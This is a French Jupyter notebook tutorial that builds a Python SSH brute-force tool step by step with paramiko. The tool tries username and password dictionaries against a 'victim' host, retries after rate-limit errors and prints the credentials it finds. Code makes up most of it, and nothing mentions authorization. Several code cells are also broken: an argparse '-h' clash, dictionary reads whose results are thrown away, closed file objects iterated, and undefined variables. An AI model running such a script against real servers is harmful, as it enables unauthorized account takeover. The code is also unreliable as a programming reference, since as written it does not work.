## Le Brute Force

### Le Brute Force qu'est ce que c'est ?

Le brute force est une type d'attaque informatique utilisé pour trouvé un mot de passe, un identifiant ou encore déchiffrer une clé.
Il est principalement utilisé avec un (ou plusieurs) dictionnaire. Un dictionnaire est simplement un fichier contenant plusieurs chaine de charactère. Par exemple un fichier contenant des dizaines de mot de passe.

### Pourquoi utilisé le Brute Force ?

Ce type d'attaque, comme vu ci-dessus sert à utilisé un dictionnaire pour "forcée comme une brute" et trouvé / dechiffrer une information souhaité. Nous allons voir ci-dessous un example de Brute Force du service SSH via Python.


### Les prérequis

Nous allons utilisé Python3 (Car Python2 est dépréciée), il est donc indispensable. Lien pour l'installé : [ici](https://www.python.org/downloads/)

Pour etre plus précis nous allons utilisé Python3.10.

Pour pouvoir se connecter en SSH depuis Python il y a 2 possibilités : 

1. Paramiko

Paramiko est un module Python fréquemment utilisé pour implémenté ssh dans notre code. Pour l'installer il suffit de lancer cette commande : `python3 -m pip install paramiko`


1. Subprocess

Subprocess n'est rien de plus qu'un module python, préinstallé (Built-in) qui permet de lancer des commandes dans le terminal.

### Let's get started

Pour commencer, importons les modules que nous aurons besoins.

1. argparse : Est un module préinstallé (Built-in) sur Python3 qui permet de prendre en charge facilement des arguments<br>
(Ex: python3 bruteforce.py -a argument1 --secondargument argument2)<br>


2. paramiko : Est un module à installé permetant en autre de crée un client SSH directement depuis Python


3. time : Est un module préinstallé (Built-in) sur Python3 qui permet de d'éffectué différente action sur le temps. Dans notre cas, il sera utilisé pour marquer une pause en secondes.

In [ ]:
import argparse
import paramiko
import time

### En premier...

Dans un premier temps nous allons prendre en charge les différent arguments que l'on aura besoin pour notre script.

Nous aurons besoin de : l'hôte que nous allons attaqué, sur quel port attaqué, un nom dutilisateur et un mot de passe.

Néamoins, comme préciser ci-dessus, le Brute Force utilise un/des dictionnaire(s) mais dans certain cas nous voulons utilisé 1 seul nom d'utilisateur avec un dictionnaire de mot de passe ou inversement ou encore les 2 en même temps.

Donc nous allons ajouter 2 type d'argument : Une liste de nom d'utilisateur et une liste de mot de passe.

### Un peu de vocabulaire...

Parser : Dans Python, la variable parser fait apelle au module argparse pour pouvoir ajouter des argument ou encore les analyser et les rendre utilisable par Python.

None : Commun a plusieurs languages de programation, None (Ou Void) veut simplement dire que la variable ou autre n'est égale a rien

In [ ]:
parser = argparse.ArgumentParser()          #Fait appelle a la partie ArgumentParser du module argparse. ArgumentParser sert à prendre en compte les argument
parser.add_argument('-h', '--host', help="Definie l'hôte que nous allons attaqué")      # Ex: python3 bruteforce.py -h/--host 127.0.0.1
parser.add_argument('-s', '--port', help="Definie le port que nous allons attaqué", default=22)     # L'option default sert à mettre une valeur par défaut
parser.add_argument('-u', '--username', help="Définie un SEUL nom d'utilisateur", default=None)         # L'option default est ici utilisé pour rendre 
parser.add_argument('-U', '--userlist', help="Définie le chemin vers un dictionnaire", default=None)    # cette argument non obligatoire
parser.add_argument('-p', '--password', help="Définie un SEUL mot de passe", default=None)
parser.add_argument('-P', '--passlist', help="Définie le chemin vers un dictionnaire", default=None)
args = parser.parse_args()      # Nous initialisont les argument pour pouvoir les utiliser comme ceci : args.host, args.port, args.username...

Maintenant que nous pouvont utilisé nos arguments dans Python, nous pouvons commencer a s'amuser !

### Quelque notion de Python...

Dans cette partie, nous allons voir les notions de "try catch". Cette notion est présente dans la plus part des languages de programmation et permet "d'essayer" de lancer une partie de programme et si celle-ci tombe en erreur, gérer les exception au lieu d'arreter le programme.

Pour se faire, sur Python la syntaxe est telle quelle :
```
try:
    programmealancer()
except Exception:
    print('KABOUM!')
````

La premier partie, le "try" dit a Python que nous allons essayer de lancer le programme ci-dessous.

La seconde partie, en dessous du "try" est le programme que nous voulons lancé (Ex: fonctions, classes, module...)

Et la dernière partie, la partie Exception, "except" dit a Python que si le programme est tombé en erreur d'executer les actions prévue (Dans ce cas afficher "KABOUM!")

NB : "Exception" est l'exception dite basique, elle prend en compte toutes les exceptions sans etre précise, il est préférable de mettre une exception spécifique (Que nous allons voir plus tard)

### Attaquons !

Pour attaquer note victime, nous allons : 

1. Crée le client SSH

1. Ajouter sur notre système les hôtes SSH connue (Pour éviter tout problème)

1. Essayer de se connecter à notre victime via SSH

1. Si la connexion est réussite, écrire "Hello World" en Python

Mais avant de faire tous ca, nous allons définir nos différente variable pour avoir une meilleure visibilité sur notre code

In [ ]:
"""Pour simplifier notre example, nous allons utilisé 1 seul nom d'utilisateur et 1 seul mot de passe"""
host = args.host
port = args.port
username = args.username
password = args.password

### La création du client SSH

Pour crée le client SSH nous allons appeller, la classe SSHClient présente dans le module paramiko.

Pour que la connexion fonctionne, nous allons devoir définir une clé hôte (Pour comfirmer a notre système que c'est bien notre machine qui veut communiquer en SSH et non un attaquant qui performerait une attaque "d'homme du milieu" (Man in the middle))

Pour se faire nous allons appellé la fonction set_missing_host_key_policy présente dans la classe SSHClient. Et nous allons lui donner en paramettre la classe du module paramiko AutoAddPolicy (Qui va juste crée une clé et la configurer automatiquement) 

In [ ]:
ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy)

Et voila ! Nous somme pret à essayer de se connecter en SSH sur une machine!

### La connexion

Pour se connecter nous allons utiliser un "try catch" pour detecter quel type d'érreur nous aurons (Mauvais mot de passe, trop de requètes...)

Avec paramiko, une fois le client mis en place, il suffit de faire apelle a la fonction connect du module SSHClient en lui fourniissant en parametre : 
un nom d'hote (hostname), un nom d'utilisateur (username), un mot de passe (password) et un délai d'attente maximale.

Si la connexion n'est pas concluente nous allons utilisé des "Exception" spécifique qui nous diront exactement qu'est ce qui c'est passé (Mauvais mot de passe, trop de requètes...).

Nous allons utilisé spécifiquement les module d'Exception de paramiko, plus précisement les Exception : AuthenticationException (Mauvais mot de passe) et SSHException (Trop de requètes).

In [ ]:
try:
    ssh_client.connect(hostname=host, username=username, password=password, timeout=3)
except paramiko.AuthenticationException:
    print(f'[ERREUR] : Mauvais Identifiant!\n')
except paramiko.SSHException:
    print('[ATTENTION : SSH connection] : Trop de requètes envoyé !')

Et voila ! Le principe de base, mais ce n'est pas encore du brute force, nous n'utilisont pas de dictionaire.

Nous allons remédier a cela !

### Les fichiers sur Python

Python à un module préinstallé (Built-in) qui permet de lire, modifier, écrire, ajouter à un fichier, même de le supprimer. Nous allons l'utiliser pour lire notre dictionnaire et le mettre sous forme de liste que python pourra comprendre.

Ce module est open, et comme son nom l'indique il ouvre un fichier, et nous permet d'effectuer toutes les opération possible que l'on pourrait normalement faire avec un fichier.
/_\ Il ne faut surtout pas oublier de fermer le dossier pour eviter de corompre les données


### Quelques notion de Python

Avec Python on peut donner des alias a des fonction/variable/classe... Grace a la méthode with il est possible d'utiliser d'ouvrir un fichier et de le fermer automatiquement mais pas que.
Cette méthode se montre sous cette forme :
```
with somevar as sv:
    sv.dosomething
```

### Continuons

On va maintenant lire un dictionnaire (un fichier) et le rendre utilisable par Python

In [ ]:
userlist = args.userlist
passlist = args.passlist

with open(userlist) as user_dictionnaire:
    user_dictionnaire.read().splitlines()               # Le .read est une fonction servant à lire le fichier et le .splitlines est aussi une fonction servant la séparer les lignes d'un fichier en liste.

with open(passlist) as pass_dictionnaire:
    pass_dictionnaire.read().splitlines()

"""

On aurait aussi pu faire ca de cette façon

with open(userlist) as user_dictionnaire, open(passlist) as pass_dictionnaire:
    user_dictionnaire.read().splitlines()
    pass_dictionnaire.read().splitlines()

"""

Ouf, nous avons réussi à crée une liste compréhensible par Python en partant de nos deux dictionnaires (fichiers).

### Et maintenant ? 

Maintenant que nous avons une liste il nous suffit de crée une boucle for pour tester tous les noms d'utilisateur avec tous les mots de passes de nos dictionnaires.

Mais aussi mettre en place une sécurité pour relancer le script en cas d'erreur (Surtout quand nous envoyons trop de requètes). Pour se faire nous allors juste utilisé le module continue qui va nous permettre de relancer le script a la prochaine itération.
Et pour ne pas avoir l'erreur une deuxième fois, nous allons attendre 1à secondes avant de le relancer.

In [ ]:
for user in user_dictionnaire:
    for password in pass_dictionnaire:
        try:
            ssh_client.connect(hostname=host, username=username, password=password, timeout=3)
        except paramiko.AuthenticationException:
            print(f'[ERREUR] : Mauvais Identifiant!\n')
        except paramiko.SSHException:
            print('[ATTENTION : SSH connection] : Trop de requètes envoyé !')
            time.sleep(10)
            continue

C'est bien beau mais n'avons pas un code "facile" à utiliser. Que se passe t'il si l'utilisateur rentre un nom d'utilisateur et une liste d'utilisateur ? Ou alors avec un mot de passe et une liste de mot de passe ? Ou encore pire, si l'utilisateur nous donne un nom d'utilisateur sans mot de passe ?

Il faut mettre en place des règles pour eviter tous cela.

Pour se faire, rien de plus simple que des mettre plusieurs conditions pour que le code fonctionne correctement.

In [ ]:
if userlist is not None and passlist is not None:
    with open(userlist) as user_dictionnaire, open(passlist) as pass_dictionnaire:
        user_dictionnaire.read().splitlines()
        pass_dictionnaire.read().splitlines()

    for user in user_dictionnaire:
        for password in pass_dictionnaire:
            try:
                ssh_client.connect(hostname=host, username=username, password=password, timeout=3)
            except paramiko.AuthenticationException:
                print(f'[ERREUR] : Mauvais Identifiant!\n')
            except paramiko.SSHException:
                print('[ATTENTION : SSH connection] : Trop de requètes envoyé !')
            else:
                print("Voici les identifiants de connexion SSH :", user, password)

if userlist is not None and password:
    with open(userlist) as user_dictionnaire:
        user_dictionnaire.read().splitlines()  

    for user in user_dictionnaire:
        try:
            ssh_client.connect(hostname=host, username=username, password=password, timeout=3)
        except paramiko.AuthenticationException:
            print(f'[ERREUR] : Mauvais Identifiant!\n')
        except paramiko.SSHException:
            print('[ATTENTION : SSH connection] : Trop de requètes envoyé !')
        else:
            print("Voici les identifiants de connexion SSH :", user, password)

if username is not None and passlist is not None:
    with open(passlist) as pass_dictionnaire:
        pass_dictionnaire.read().splitlines()

    for password in pass_dictionnaire:
        try:
            ssh_client.connect(hostname=host, username=username, password=password, timeout=3)
        except paramiko.AuthenticationException:
            print(f'[ERREUR] : Mauvais Identifiant!\n')
        except paramiko.SSHException:
            print('[ATTENTION : SSH connection] : Trop de requètes envoyé !')
        else:
            print("Voici les identifiants de connexion SSH :", user, password)

### Conclusion

Ce code est loin d'etre parfait, il se repetre plusieurs fois, il n'y a pas de fonction, il n'est pas dans l'ordre... Mais il nous permet d'avoir une petite compréhension de comment certain script pratique le Brute Force sur le protocole SSH.
Voici à quoi un meilleure code ressemblerait:

In [ ]:
import argparse
import paramiko
import time
import socket 

def ssh_bruteforce(host, username, password):
    try:
        ssh_client.connect(hostname=host, username=username, password=password, timeout=3)
    except socket.timeout:
        print(f"[ERROR] : L'hôte {host} à pris trop de temps à répondre.")
    except paramiko.AuthenticationException:
        print(f'[ERREUR] : Mauvais Identifiant!\n')
    except paramiko.SSHException:
        print('[ATTENTION : SSH connection] : Trop de requètes envoyé !')
        time.sleep(10)
        return ssh_bruteforce(host, user, password)
    else:
        print(f"[Succès] Les identifiants sont {user}:{password}")
        return True

if __name__ == '__main__':
    parser = argparse.ArgumentParser()          #Fait appelle a la partie ArgumentParser du module argparse. ArgumentParser sert à prendre en compte les argument
    parser.add_argument('-h', '--host', help="Definie l'hôte que nous allons attaqué")      # Ex: python3 bruteforce.py -h/--host 127.0.0.1
    parser.add_argument('-s', '--port', help="Definie le port que nous allons attaqué", default=22)     # L'option default sert à mettre une valeur par défaut
    parser.add_argument('-u', '--username', help="Définie un SEUL nom d'utilisateur", default=None)         # L'option default est ici utilisé pour rendre 
    parser.add_argument('-U', '--userlist', help="Définie le chemin vers un dictionnaire", default=None)    # cette argument non obligatoire
    parser.add_argument('-p', '--password', help="Définie un SEUL mot de passe", default=None)
    parser.add_argument('-P', '--passlist', help="Définie le chemin vers un dictionnaire", default=None)
    args = parser.parse_args()      # Nous initialisont les argument pour pouvoir les utiliser comme ceci : args.host, args.port, args.username...

    host = args.host
    port = args.port

    if userlist is not None and passlist is not None:
        with open(userlist) as user_dictionnaire, open(passlist) as pass_dictionnaire:
            user_dictionnaire.read().splitlines()
            pass_dictionnaire.read().splitlines()

        for user in user_dictionnaire:
            for password in pass_dictionnaire:
                if ssh_bruteforce(host, user, password):
                    print("Le script va maintenant s'arreter")
                else:
                    print("Le script n'a pas trouver d'itenfiant et va maintenant s'arreter")

    if userlist is not None and password:
        with open(userlist) as user_dictionnaire:
            user_dictionnaire.read().splitlines()  

        for user in user_dictionnaire:
            if ssh_bruteforce(host, user, password):
                print("Le script va maintenant s'arreter")
            else:
                print("Le script n'a pas trouver d'itenfiant et va maintenant s'arreter")

    if username is not None and passlist is not None:
        with open(passlist) as pass_dictionnaire:
            pass_dictionnaire.read().splitlines()

        for password in pass_dictionnaire:
            if ssh_bruteforce(host, user, password):
                print("Le script va maintenant s'arreter")
            else:
                print("Le script n'a pas trouver d'itenfiant et va maintenant s'arreter")